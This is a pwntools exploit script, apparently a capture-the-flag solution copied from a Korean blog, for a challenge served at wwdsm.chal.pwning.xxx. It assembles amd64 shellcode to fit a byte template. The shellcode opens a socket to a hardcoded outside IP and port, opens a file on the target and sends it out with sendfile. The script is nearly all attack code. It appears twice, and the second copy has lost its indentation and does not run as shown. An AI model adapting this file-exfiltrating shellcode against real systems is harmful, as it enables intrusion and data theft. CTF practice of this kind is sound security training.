0xBADCA7/wait_wait_dont_shell_me.py

## wait_wait_dont_shell_me.py
from pwn import *
context.arch = 'amd64'


CODES = '''b8 __ __ __ __ bf __ __ __ __ be __ __ __ __ ba
__ __ __ __ 01 c7 29 fe 21 f2 0f 05 48 b8 __ __
__ __ __ __ __ __ 50 b8 __ __ __ __ ba __ __ __
__ bf __ __ __ __ 48 89 __ 0f 05 be __ __ __ __
bf __ __ __ __ ba __ __ __ __ 83 c0 __ 0f 05 89
__ b8 __ __ __ __ bf __ __ __ __ 41 ba __ __ __
__ 0f 05 58'''.replace(' ','').replace('\n','').replace('__','cc').decode('hex')

#print disasm(CODES.replace('\xcc','\x90'),offset=False, byte=False)

def assemble(code):
    codes = asm(code)
    print disasm(codes)
    print len(codes), len(CODES)
    assert len(codes) == len(CODES)
    byte = []
    for i in xrange(len(codes)):
        if CODES[i] != '\xcc':
            assert CODES[i] == codes[i]
        else:
            byte.append(ord(codes[i]))
    return byte


#for x in xrange(0, 0x100000, 0x100):
x = 0
if 1:
    try:
        r =  remote('wwdsm.chal.pwning.xxx',6615, level='error')

        print r.recv()


        code = '''
        mov    eax, SYS_socket
        mov    edi, -SYS_socket+2
        mov    esi, 3
        mov    edx, 0
        add    edi,eax
        sub    esi,edi
        and    edx,esi
        syscall
        movabs rax,0x864add12d2040002 /*ip port AF_INET*/
        push   rax
        mov    eax,SYS_connect
        mov    edx,0x10
        mov    edi,0
        mov    rsi,rsp
        syscall
        mov    esi,0
        mov    edi,0x400cb8+{}
        mov    edx,0
        add    eax,SYS_open
        syscall
        mov    esi, eax
        mov    eax, SYS_sendfile
        mov    edi,0
        mov    r10d,0x999
        syscall
        pop    rax
        '''.format(x)

        p = assemble(code)

        p = '\n'.join(map(lambda x: '%02x'%x,p))

        r.sendline(p)
        print r.recv()
        print r.recvuntil('won!\n')
        print 0
        #r.sendline('asdf')
        print r.recv()
        print r.recv()
        print r.recv()
        print r.recv()
    except KeyboardInterrupt:
        pass
    except Exception as e:
        print e
    finally:
        print x


#출처: http://push0ebp.tistory.com/31 [Hacks]
	from pwn import *
	context.arch = 'amd64'


	CODES = '''b8 __ __ __ __ bf __ __ __ __ be __ __ __ __ ba
	__ __ __ __ 01 c7 29 fe 21 f2 0f 05 48 b8 __ __
	__ __ __ __ __ __ 50 b8 __ __ __ __ ba __ __ __
	__ bf __ __ __ __ 48 89 __ 0f 05 be __ __ __ __
	bf __ __ __ __ ba __ __ __ __ 83 c0 __ 0f 05 89
	__ b8 __ __ __ __ bf __ __ __ __ 41 ba __ __ __
	__ 0f 05 58'''.replace(' ','').replace('\n','').replace('__','cc').decode('hex')

	#print disasm(CODES.replace('\xcc','\x90'),offset=False, byte=False)

	def assemble(code):
	codes = asm(code)
	print disasm(codes)
	print len(codes), len(CODES)
	assert len(codes) == len(CODES)
	byte = []
	for i in xrange(len(codes)):
	if CODES[i] != '\xcc':
	assert CODES[i] == codes[i]
	else:
	byte.append(ord(codes[i]))
	return byte




	#for x in xrange(0, 0x100000, 0x100):
	x = 0
	if 1:
	try:
	r = remote('wwdsm.chal.pwning.xxx',6615, level='error')

	print r.recv()



	code = '''
	mov eax, SYS_socket
	mov edi, -SYS_socket+2
	mov esi, 3
	mov edx, 0
	add edi,eax
	sub esi,edi
	and edx,esi
	syscall
	movabs rax,0x864add12d2040002 /ip port AF_INET/
	push rax
	mov eax,SYS_connect
	mov edx,0x10
	mov edi,0
	mov rsi,rsp
	syscall
	mov esi,0
	mov edi,0x400cb8+{}
	mov edx,0
	add eax,SYS_open
	syscall
	mov esi, eax
	mov eax, SYS_sendfile
	mov edi,0
	mov r10d,0x999
	syscall
	pop rax
	'''.format(x)

	p = assemble(code)

	p = '\n'.join(map(lambda x: '%02x'%x,p))

	r.sendline(p)
	print r.recv()
	print r.recvuntil('won!\n')
	print 0
	#r.sendline('asdf')
	print r.recv()
	print r.recv()
	print r.recv()
	print r.recv()
	except KeyboardInterrupt:
	pass
	except Exception as e:
	print e
	finally:
	print x


	#출처: http://push0ebp.tistory.com/31 [Hacks]